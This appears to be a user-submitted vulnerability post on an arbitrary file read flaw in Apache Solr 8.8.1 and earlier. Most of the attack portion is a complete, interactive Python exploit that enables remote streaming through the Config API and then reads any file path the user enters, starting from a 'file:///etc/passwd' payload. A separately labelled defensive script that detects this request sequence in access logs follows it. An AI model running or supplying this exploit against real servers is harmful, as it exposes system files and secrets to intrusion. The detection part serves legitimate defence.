J_Dream | Apache Solr

User submission 432 2022-09-30


J_Dream | Apache Solr <=8.8.1 arbitrary file read vulnerability

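1. Introduction

Solr is a standalone enterprise search application server that exposes an API similar to a web service. Users submit search requests with GET and receive the results in XML format.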

2. Vulnerability impact

3. Reproducing the vulnerability

Payload (POST): stream.url=file:///etc/passwd

Python POC:

```python
import json
import sys

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def POC_1(target_url):
    # Step 1: list the cores through the admin API and take the first core name.
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=10)
        core_name = list(json.loads(response.text)["status"])[0]
        print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
        return core_name
    except Exception:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
        return None


def POC_2(target_url, core_name):
    # Step 2: use the Config API to switch on enableRemoteStreaming for the core.
    vuln_url = target_url + "/solr/" + core_name + "/config"
    headers = {
        "Content-type": "application/json"
    }
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在准备文件读取...... \033[0m")
        if "This" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


def POC_3(target_url, core_name, File_name):
    # Step 3: send stream.url=file://<path> to the debug/dump handler and print the echoed stream.
    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = 'stream.url=file://{}'.format(File_name)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        if "No such file or directory" in response.text:
            print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
        else:
            print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


if __name__ == '__main__':
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    core_name = POC_1(target_url)
    if core_name is None:
        # No core name could be obtained, so the later steps cannot build their URLs.
        sys.exit(1)
    POC_2(target_url, core_name)

    while True:
        File_name = str(input("\033[35mFile >>> \033[0m"))
        POC_3(target_url, core_name, File_name)
```
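A defender-side companion to the three requests in the PoC above, as an added example that is not part of the original post: it scans access-log lines for a Config API POST followed by a request to `/debug/dump?param=ContentStreams` from the same client. The log format, the addresses, the core name `demo` and the `high`/`review` labels are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); addresses and core name are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Sep/2022:10:00:01 +0000] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 512
203.0.113.7 - - [30/Sep/2022:10:00:02 +0000] "POST /solr/demo/config HTTP/1.1" 200 148
203.0.113.7 - - [30/Sep/2022:10:00:03 +0000] "POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1" 200 2048
198.51.100.4 - - [30/Sep/2022:10:01:00 +0000] "GET /solr/demo/select?q=*:* HTTP/1.1" 200 900
198.51.100.4 - - [30/Sep/2022:10:02:00 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
CONFIG_RE = re.compile(r"/solr/[^/]+/config")
DUMP_RE = re.compile(r"/solr/[^/]+/debug/dump")


def classify(method, target):
    """Return the stage of the request sequence this request matches, or None."""
    parts = urlsplit(target)
    path, query = parts.path.rstrip("/"), parse_qs(parts.query)
    if method == "POST" and CONFIG_RE.fullmatch(path):
        return "config_write"   # Config API write; the JSON body is not in the log
    if DUMP_RE.fullmatch(path) and (
            "ContentStreams" in query.get("param", []) or "stream.url" in query):
        return "stream_dump"    # handler that echoes content streams back
    return None                 # a core listing alone is normal admin traffic


def detect(log_text):
    """Map client address -> 'high' (config write, then dump) or 'review'."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        stage = classify(method, target)
        if stage:
            seen[client].append(stage)
    alerts = {}
    for client, stages in seen.items():
        ordered = ("config_write" in stages and
                   "stream_dump" in stages[stages.index("config_write"):])
        alerts[client] = "high" if ordered else "review"
    return alerts


if __name__ == "__main__":
    for client, level in detect(SAMPLE_LOG).items():
        print(client, level)
```

Because the `stream.url` value travels in the POST body, an access log only shows the endpoint sequence; confirming which file was requested needs request-body logging or a packet capture.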

